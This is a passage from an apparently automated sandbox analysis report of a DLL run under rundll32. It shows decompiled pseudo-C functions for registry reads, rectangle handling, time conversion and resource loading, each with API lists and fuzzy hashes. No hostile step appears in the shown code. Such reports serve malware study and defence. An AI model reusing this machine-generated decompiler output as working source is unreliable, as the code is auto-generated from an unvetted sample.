                                                                        				 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x14)))) = 0;
                                                                        				 *(_t63 - 4) = 0;
                                                                        				if( *((intOrPtr*)(_t48 - 8)) == 0) {
                                                                        					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t48 - 0xac)) + 0x1c)) + 0x1c)));
                                                                        					_t35 = E10029068();
                                                                        					 *((intOrPtr*)(_t48 - 8)) = _t35;
                                                                        					if(_t35 == 0) {
                                                                        						goto L1;
                                                                        					} else {
                                                                        						if( *(_t63 + 0xc) != 0) {
                                                                        							IntersectRect(_t63 - 0x24, _t48 - 0x9c,  *(_t63 + 0xc));
                                                                        						} else {
                                                                        							asm("movsd");
                                                                        							asm("movsd");
                                                                        							asm("movsd");
                                                                        							asm("movsd");
                                                                        							_t60 = 0;
                                                                        						}
                                                                        						E1002935D(_t63 - 0x14, CreateRectRgnIndirect(_t63 - 0x24));
                                                                        						E10028ED2( *((intOrPtr*)(_t48 - 8)), _t63 - 0x14, 1);
                                                                        						_t50 =  *((intOrPtr*)(_t48 - 8));
                                                                        						if(_t50 != _t60) {
                                                                        							_t46 =  *((intOrPtr*)(_t50 + 4));
                                                                        						} else {
                                                                        							_t46 = 0;
                                                                        						}
                                                                        						 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x14)))) = _t46;
                                                                        					}
                                                                        				} else {
                                                                        					L1:
                                                                        					_t60 = 0x80004005;
                                                                        				}
                                                                        				 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
                                                                        				 *((intOrPtr*)(_t63 - 0x14)) = 0x1003eb6c;
                                                                        				E100293B4(_t63 - 0x14);
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
                                                                        				return _t60;
                                                                        			}










                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CreateH_prologIndirectRect
                                                                        • String ID:
                                                                        • API String ID: 2123978231-0
                                                                        • Opcode ID: a87c0139d17cb296c7b54c5b9e1d23ff0820d98e6926aea6deb686421628d885
                                                                        • Instruction ID: 0eb4197897c7316f9a7e31aff11a4a7e3f3024ffe359f966774616c60da486ac
                                                                        • Opcode Fuzzy Hash: a87c0139d17cb296c7b54c5b9e1d23ff0820d98e6926aea6deb686421628d885
                                                                        • Instruction Fuzzy Hash: E121397690062ADFDB01CFA4C8849AEB7B8FF08790F514166F906AB255C771AE05CFB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10034B35(intOrPtr __ecx) {
                                                                        				void* _v8;
                                                                        				char _v12;
                                                                        				int _v16;
                                                                        				intOrPtr _v20;
                                                                        				int _v24;
                                                                        				char* _t32;
                                                                        				intOrPtr _t34;
                                                                        				char** _t35;
                                                                        				signed int _t40;
                                                                        				char** _t44;
                                                                        				char* _t46;
                                                                        
                                                                        				 *((intOrPtr*)(__ecx + 0x9c)) = 0;
                                                                        				_t46 =  *0x1004b390; // 0x1003d660
                                                                        				_v20 = __ecx;
                                                                        				_v8 = 0;
                                                                        				_v12 = 0;
                                                                        				_v24 = 4;
                                                                        				_v16 = 0;
                                                                        				_t35 = 0x1004b390;
                                                                        				if(_t46 == 0) {
                                                                        					L13:
                                                                        					RegCloseKey(0);
                                                                        					return 1;
                                                                        				}
                                                                        				do {
                                                                        					if(RegOpenKeyExA(0x80000001,  *_t35, 0, 1,  &_v8) != 0) {
                                                                        						goto L11;
                                                                        					}
                                                                        					_t8 =  &(_t35[1]); // 0x1004b358
                                                                        					_t44 =  *_t8;
                                                                        					while(1) {
                                                                        						_t32 =  *_t44;
                                                                        						if(_t32 == 0) {
                                                                        							goto L11;
                                                                        						}
                                                                        						if(RegQueryValueExA(_v8, _t32, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
                                                                        							_t34 = _v20;
                                                                        							_t16 =  &(_t44[1]); // 0x1
                                                                        							_t40 =  *_t16;
                                                                        							if(_v12 == 0) {
                                                                        								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) &  !_t40;
                                                                        							} else {
                                                                        								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) | _t40;
                                                                        							}
                                                                        						}
                                                                        						_v12 = 0;
                                                                        						_v24 = 4;
                                                                        						_v16 = 0;
                                                                        						_t44 =  &(_t44[2]);
                                                                        					}
                                                                        					L11:
                                                                        					RegCloseKey(_v8);
                                                                        					_t35 =  &(_t35[2]);
                                                                        					_v8 = 0;
                                                                        				} while ( *_t35 != 0);
                                                                        				goto L13;
                                                                        			}















                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,1004B390,00000000,00000001,?), ref: 10034B78
                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 10034B98
                                                                        • RegCloseKey.ADVAPI32(?), ref: 10034BDC
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 10034BF2
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Close$OpenQueryValue
                                                                        • String ID:
                                                                        • API String ID: 1607946009-0
                                                                        • Opcode ID: 9a8edc8e7e8c630006c35e1cb287b5a1c5b92324269ffeb4073756e8a178cadc
                                                                        • Instruction ID: c59a5bb59059241ef396f1e8f67c70b524d6e5c214a839477bb571e1d0f0587e
                                                                        • Opcode Fuzzy Hash: 9a8edc8e7e8c630006c35e1cb287b5a1c5b92324269ffeb4073756e8a178cadc
                                                                        • Instruction Fuzzy Hash: 86212CB5D00259EFDB06CF96C985EAEFBF8EF80355F1240AAE405AA151D770AA00CF21
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E10026A96(void* __ecx, void* __edx, intOrPtr _a4, struct _FILETIME* _a8) {
                                                                        				struct _FILETIME _v12;
                                                                        				struct _SYSTEMTIME _v28;
                                                                        				char _v44;
                                                                        				void* __ebp;
                                                                        				int _t23;
                                                                        				int _t26;
                                                                        				int _t29;
                                                                        				int _t31;
                                                                        				void* _t40;
                                                                        				void* _t56;
                                                                        				void* _t59;
                                                                        
                                                                        				_t47 = __edx;
                                                                        				_t40 = __ecx;
                                                                        				_t56 = _t59;
                                                                        				if(_a8 != 0) {
                                                                        					_t52 = _a4;
                                                                        					_v28.wYear = E10010297(__eflags);
                                                                        					_v28.wMonth = E100102AE(__eflags);
                                                                        					_t23 = E100134E7(_a4, __edx, _a4);
                                                                        					__eflags = _t23;
                                                                        					if(__eflags == 0) {
                                                                        						_v28.wDay = 0;
                                                                        					} else {
                                                                        						_v28.wDay =  *((intOrPtr*)(_t23 + 0xc));
                                                                        					}
                                                                        					_v28.wHour = E100102C1(__eflags);
                                                                        					_v28.wMinute = E100102D4(__eflags);
                                                                        					_t26 = E100134E7(_t52, _t47, _t52);
                                                                        					__eflags = _t26;
                                                                        					if(_t26 == 0) {
                                                                        						_t14 =  &(_v28.wSecond);
                                                                        						 *_t14 = _v28.wSecond | 0x0000ffff;
                                                                        						__eflags =  *_t14;
                                                                        					} else {
                                                                        						_v28.wSecond =  *_t26;
                                                                        					}
                                                                        					_v28.wMilliseconds = 0;
                                                                        					_t29 = SystemTimeToFileTime( &_v28,  &_v12);
                                                                        					__eflags = _t29;
                                                                        					if(_t29 == 0) {
                                                                        						E100271C6(_t56, GetLastError(), 0);
                                                                        					}
                                                                        					_t31 = LocalFileTimeToFileTime( &_v12, _a8);
                                                                        					__eflags = _t31;
                                                                        					if(_t31 == 0) {
                                                                        						_t31 = E100271C6(_t56, GetLastError(), 0);
                                                                        					}
                                                                        					return _t31;
                                                                        				} else {
                                                                        					_push(_t56);
                                                                        					_push(__ecx);
                                                                        					_v44 = 0x1004d548;
                                                                        					E10011C0F( &_v44, 0x10045e48);
                                                                        					asm("int3");
                                                                        					return  *((intOrPtr*)(_t40 + 0x70));
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 10026B18
                                                                        • GetLastError.KERNEL32(00000000), ref: 10026B29
                                                                        • LocalFileTimeToFileTime.KERNEL32(?,0000FFFF), ref: 10026B38
                                                                        • GetLastError.KERNEL32(00000000), ref: 10026B43
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Time$File$ErrorLast$LocalSystem
                                                                        • String ID:
                                                                        • API String ID: 1172841412-0
                                                                        • Opcode ID: 5dc5c312d13e401fcfbadd669c1a0a16765e23d0604991783c5979921889d443
                                                                        • Instruction ID: f1a830ef30183d99209262c84c87e780bb224e30df7a02b89f1332faec0a7339
                                                                        • Opcode Fuzzy Hash: 5dc5c312d13e401fcfbadd669c1a0a16765e23d0604991783c5979921889d443
                                                                        • Instruction Fuzzy Hash: 4C11B929A1021DAACF01EBE59C458AF7B7CEF44750B41405BF805E7211EB74D681CB9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 37%
                                                                        			E1000D0B9(signed int _a4, signed int* _a8, intOrPtr _a12) {
                                                                        				void* _t14;
                                                                        				signed int _t16;
                                                                        				signed int _t17;
                                                                        				signed int _t18;
                                                                        				signed int _t20;
                                                                        				signed int _t23;
                                                                        				signed int* _t31;
                                                                        
                                                                        				_t31 = _a8;
                                                                        				if(_t31 == 0) {
                                                                        					return _t14;
                                                                        				}
                                                                        				_t23 = _a4;
                                                                        				if((_t23 & 0x00000020) == 0) {
                                                                        					_t16 = (_t23 & 0x0000ffff) - 8;
                                                                        					__eflags = _t16;
                                                                        					if(_t16 == 0) {
                                                                        						__imp__#6( *_t31);
                                                                        						L16:
                                                                        						 *_t31 =  *_t31 & 0x00000000;
                                                                        						L17:
                                                                        						if((_t23 & 0x00000010) != 0 &&  !(_t23 & 0x00004000) != 0) {
                                                                        							__imp__CoTaskMemFree(_t31[1]);
                                                                        						}
                                                                        						return _t16;
                                                                        					}
                                                                        					_t17 = _t16 - 1;
                                                                        					__eflags = _t17;
                                                                        					if(_t17 == 0) {
                                                                        						L13:
                                                                        						_t16 =  *_t31;
                                                                        						__eflags = _t16;
                                                                        						if(_t16 == 0) {
                                                                        							goto L17;
                                                                        						}
                                                                        						_t16 =  *((intOrPtr*)( *_t16 + 8))(_t16);
                                                                        						goto L16;
                                                                        					}
                                                                        					_t16 = _t17 - 3;
                                                                        					__eflags = _t16;
                                                                        					if(_t16 == 0) {
                                                                        						__imp__#9(_t31);
                                                                        						goto L17;
                                                                        					}
                                                                        					_t18 = _t16 - 1;
                                                                        					__eflags = _t18;
                                                                        					if(_t18 == 0) {
                                                                        						goto L13;
                                                                        					}
                                                                        					_t16 = _t18 - 0x7b;
                                                                        					__eflags = _t16;
                                                                        					if(__eflags == 0) {
                                                                        						E1000D03C( &_a8, __eflags, _a12);
                                                                        						_t20 = _a8;
                                                                        						__eflags = _t20;
                                                                        						if(_t20 != 0) {
                                                                        							 *((intOrPtr*)( *_t20 + 0x10))(_t20,  *_t31, 0);
                                                                        						}
                                                                        						_t16 = L1000C8E6( &_a8);
                                                                        					}
                                                                        					goto L17;
                                                                        				}
                                                                        				_t16 =  *_t31;
                                                                        				if(_t16 == 0) {
                                                                        					goto L17;
                                                                        				}
                                                                        				__imp__#16(_t16);
                                                                        				goto L16;
                                                                        			}

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ArrayDestroyFreeSafeTask
                                                                        • String ID:
                                                                        • API String ID: 3253174383-0
                                                                        • Opcode ID: e8ad03aeafd3d0ea856f226044b8eb18344ba6786890ac13f09cc67cb798247f
                                                                        • Instruction ID: d5df2e689e9d8d1315e3bdacc16dfbb058a5afc5faf3f73fb235713c606ee203
                                                                        • Opcode Fuzzy Hash: e8ad03aeafd3d0ea856f226044b8eb18344ba6786890ac13f09cc67cb798247f
                                                                        • Instruction Fuzzy Hash: E711563010020ABBFB55EF66DC84BEE77A8EF457D0F10441AFA858A198CF35EA00CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 64%
                                                                        			E1000C037(void* __edi) {
                                                                        				int _t36;
                                                                        				void* _t52;
                                                                        				intOrPtr* _t55;
                                                                        				void* _t56;
                                                                        				void* _t58;
                                                                        
                                                                        				E10011BF0(0x1003aec3, _t58);
                                                                        				 *((intOrPtr*)(_t58 - 0x10)) = 0;
                                                                        				 *((intOrPtr*)(_t58 - 0x14)) = 0x10040668;
                                                                        				_t55 =  *((intOrPtr*)(_t58 + 8));
                                                                        				 *(_t58 - 4) = 0;
                                                                        				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                        					_push( *((intOrPtr*)(_t58 + 0xc)));
                                                                        					_t52 = E1002934F();
                                                                        					GetRgnBox( *(_t52 + 4), _t58 - 0x24);
                                                                        					IntersectRect(_t58 - 0x34, _t58 - 0x24, _t55 - 0x9c);
                                                                        					_t36 = EqualRect(_t58 - 0x34, _t58 - 0x24);
                                                                        					_push( *((intOrPtr*)(_t58 + 0x10)));
                                                                        					if(_t36 != 0) {
                                                                        						_push(_t52);
                                                                        						E1000B505( *((intOrPtr*)( *((intOrPtr*)(_t55 - 0xac)) + 0x1c)));
                                                                        						_t56 = 0;
                                                                        					} else {
                                                                        						_t56 =  *((intOrPtr*)( *_t55 + 0x64))(_t55, 0);
                                                                        					}
                                                                        				} else {
                                                                        					_t56 =  *((intOrPtr*)( *_t55 + 0x64))(_t55, 0,  *((intOrPtr*)(_t58 + 0x10)));
                                                                        				}
                                                                        				 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
                                                                        				 *((intOrPtr*)(_t58 - 0x14)) = 0x1003eb6c;
                                                                        				E100293B4(_t58 - 0x14);
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
                                                                        				return _t56;
                                                                        			}

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$EqualH_prologIntersect
                                                                        • String ID:
                                                                        • API String ID: 2227276553-0
                                                                        • Opcode ID: 78599ba6039fb6f2ff74285b4e7690d6ab97fe85a90664b5396fc8c378847134
                                                                        • Instruction ID: 4a10622ef6c9ad6aa885a1ca4e3b79ad8472db7afe28fedb0a7e7fe58967940e
                                                                        • Opcode Fuzzy Hash: 78599ba6039fb6f2ff74285b4e7690d6ab97fe85a90664b5396fc8c378847134
                                                                        • Instruction Fuzzy Hash: 19210B7290025DEFDB11DFA4C984D9EBBB8FF08291B11466AF906E7250D731AE11CF61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E100306DB(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                        				int _v8;
                                                                        				int _t21;
                                                                        				intOrPtr _t35;
                                                                        				int _t39;
                                                                        				void* _t49;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_push(__ecx);
                                                                        				_t49 = __ecx;
                                                                        				_t39 = _a4 -  *((intOrPtr*)(__ecx + 4));
                                                                        				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
                                                                        				_v8 = _t21;
                                                                        				OffsetRect(__ecx + 0x28, _t39, _t21);
                                                                        				OffsetRect(_t49 + 0x48, _t39, _v8);
                                                                        				OffsetRect(_t49 + 0x38, _t39, _v8);
                                                                        				OffsetRect(_t49 + 0x58, _t39, _v8);
                                                                        				_t51 =  *((intOrPtr*)(_t49 + 0x80));
                                                                        				 *((intOrPtr*)(_t49 + 4)) = _a4;
                                                                        				 *((intOrPtr*)(_t49 + 8)) = _a8;
                                                                        				if( *((intOrPtr*)(_t49 + 0x80)) == 0) {
                                                                        					_t35 = E100301DC();
                                                                        				} else {
                                                                        					_t35 = 0;
                                                                        				}
                                                                        				 *((intOrPtr*)(_t49 + 0x74)) = _t35;
                                                                        				return E10030582(_t49, _t51, 0);
                                                                        			}









                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: OffsetRect
                                                                        • String ID:
                                                                        • API String ID: 177026234-0
                                                                        • Opcode ID: beee98248f834fb6aab91ac6ff05766e8fc6b9e8229c4719242bff28fb5fbeb9
                                                                        • Instruction ID: 422a5061f760cbc8c05fd093b4a9fb31e1b7e654ec4c61e66631bb08b1bca8e5
                                                                        • Opcode Fuzzy Hash: beee98248f834fb6aab91ac6ff05766e8fc6b9e8229c4719242bff28fb5fbeb9
                                                                        • Instruction Fuzzy Hash: 3D110CB6600608BFD711DFEDC994DABB7ECEF48210F00882AF54AD7610E670FA408B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E1001EFFC(void* __ecx) {
                                                                        				void* _v8;
                                                                        				signed short _t23;
                                                                        				void* _t30;
                                                                        				struct HINSTANCE__* _t32;
                                                                        				signed short _t34;
                                                                        				void* _t36;
                                                                        				signed short* _t39;
                                                                        				signed short _t41;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_t36 = __ecx;
                                                                        				_t39 =  *(__ecx + 0x5c);
                                                                        				_v8 =  *((intOrPtr*)(__ecx + 0x58));
                                                                        				if( *((intOrPtr*)(__ecx + 0x54)) != 0) {
                                                                        					_t32 =  *(E100373B5() + 0xc);
                                                                        					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t36 + 0x54), 5));
                                                                        				}
                                                                        				if(_v8 != 0) {
                                                                        					_t39 = LockResource(_v8);
                                                                        				}
                                                                        				_t30 = 1;
                                                                        				if(_t39 != 0) {
                                                                        					_t34 =  *_t39;
                                                                        					if(_t39[1] != 0xffff) {
                                                                        						_t23 = _t39[5];
                                                                        						_t41 = _t39[6];
                                                                        					} else {
                                                                        						_t34 = _t39[6];
                                                                        						_t23 = _t39[9];
                                                                        						_t41 = _t39[0xa];
                                                                        					}
                                                                        					if((_t34 & 0x00001801) != 0 || _t23 != 0 || _t41 != 0) {
                                                                        						_t30 = 0;
                                                                        					}
                                                                        				}
                                                                        				if( *(_t36 + 0x54) != 0) {
                                                                        					FreeResource(_v8);
                                                                        				}
                                                                        				return _t30;
                                                                        			}












                                                                        APIs
                                                                        • FindResourceA.KERNEL32(?,00000000,00000005), ref: 1001F022
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 1001F02A
                                                                        • LockResource.KERNEL32(00000000), ref: 1001F03C
                                                                        • FreeResource.KERNEL32(00000000), ref: 1001F086
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLock
                                                                        • String ID:
                                                                        • API String ID: 1078018258-0
                                                                        • Opcode ID: 64b13492dfaf21cbbf07bee8131a48b852f4c6a235dda3ed0121460069c880f2
                                                                        • Instruction ID: f62bb37731aceb1cfac18bd5f8f11ebe971a113ae325be4be6212f910cba7098
                                                                        • Opcode Fuzzy Hash: 64b13492dfaf21cbbf07bee8131a48b852f4c6a235dda3ed0121460069c880f2
                                                                        • Instruction Fuzzy Hash: 8711E73A500715EFD722EFA1C988AABB7B4FF18794F00815CE8429B652D770EC84CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E100257A8(void* __ecx, void* __esi) {
                                                                        				void* _v8;
                                                                        				void* __ebp;
                                                                        				void* _t9;
                                                                        				void* _t11;
                                                                        				void* _t23;
                                                                        				intOrPtr* _t30;
                                                                        				void* _t32;
                                                                        				void* _t35;
                                                                        
                                                                        				_t32 = __esi;
                                                                        				_push(__ecx);
                                                                        				_t23 = __ecx;
                                                                        				_t9 = E1001F77E(0x10);
                                                                        				_t36 = _t9;
                                                                        				if(_t9 == 0) {
                                                                        					_t30 = 0;
                                                                        					__eflags = 0;
                                                                        				} else {
                                                                        					_t30 = E10025742(_t9, _t36, 0xffffffff);
                                                                        				}
                                                                        				_push(_t32);
                                                                        				_t11 = GetCurrentProcess();
                                                                        				if(DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2) == 0) {
                                                                        					if(_t30 != 0) {
                                                                        						 *((intOrPtr*)( *_t30 + 4))(1);
                                                                        					}
                                                                        					E100271C6(_t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
                                                                        				}
                                                                        				 *((intOrPtr*)(_t30 + 4)) = _v8;
                                                                        				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
                                                                        				return _t30;
                                                                        			}












                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 100257DC
                                                                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 100257E2
                                                                        • DuplicateHandle.KERNEL32(00000000), ref: 100257E5
                                                                        • GetLastError.KERNEL32(?), ref: 10025800
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentProcess$DuplicateErrorHandleLast
                                                                        • String ID:
                                                                        • API String ID: 3907606552-0
                                                                        • Opcode ID: 11538b09ad9ddda7391d08133ea87a958c9f6af064afdfc5abc666ebaf632c0d
                                                                        • Instruction ID: ac2035d42823edd271a7cb90e834c31b18cb545283139df8f74de7ed2b30b58d
                                                                        • Opcode Fuzzy Hash: 11538b09ad9ddda7391d08133ea87a958c9f6af064afdfc5abc666ebaf632c0d
                                                                        • Instruction Fuzzy Hash: 9A01D435740204AFEB01DBA9EC89F5A7BA8EF84761F104515F905CF182EB71EC0097A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E1001D8A6(void* __ecx, struct tagPOINT* _a8) {
                                                                        				struct tagPOINT _v12;
                                                                        				struct tagPOINT* _t8;
                                                                        				struct HWND__* _t9;
                                                                        				int _t14;
                                                                        				long _t18;
                                                                        				struct HWND__* _t20;
                                                                        				struct HWND__* _t21;
                                                                        				struct HWND__* _t24;
                                                                        
                                                                        				_t8 = _a8;
                                                                        				_v12.x = _t8->x;
                                                                        				_t18 = _t8->y;
                                                                        				_push(_t18);
                                                                        				_v12.y = _t18;
                                                                        				_t9 = WindowFromPoint( *_t8);
                                                                        				_t24 = _t9;
                                                                        				if(_t24 != 0) {
                                                                        					_t20 = GetParent(_t24);
                                                                        					if(_t20 == 0 || E10029A8E(_t20, 2) == 0) {
                                                                        						ScreenToClient(_t24,  &_v12);
                                                                        						_t21 = E10029C98(_t24, _v12.x, _v12.y);
                                                                        						if(_t21 == 0) {
                                                                        							L6:
                                                                        							_t9 = _t24;
                                                                        						} else {
                                                                        							_t14 = IsWindowEnabled(_t21);
                                                                        							_t9 = _t21;
                                                                        							if(_t14 != 0) {
                                                                        								goto L6;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t9 = _t20;
                                                                        					}
                                                                        				}
                                                                        				return _t9;
                                                                        			}












                                                                        APIs
                                                                        • WindowFromPoint.USER32(?,?), ref: 1001D8BD
                                                                        • GetParent.USER32(00000000), ref: 1001D8CB
                                                                        • ScreenToClient.USER32 ref: 1001D8EC
                                                                        • IsWindowEnabled.USER32(00000000), ref: 1001D905
                                                                          • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
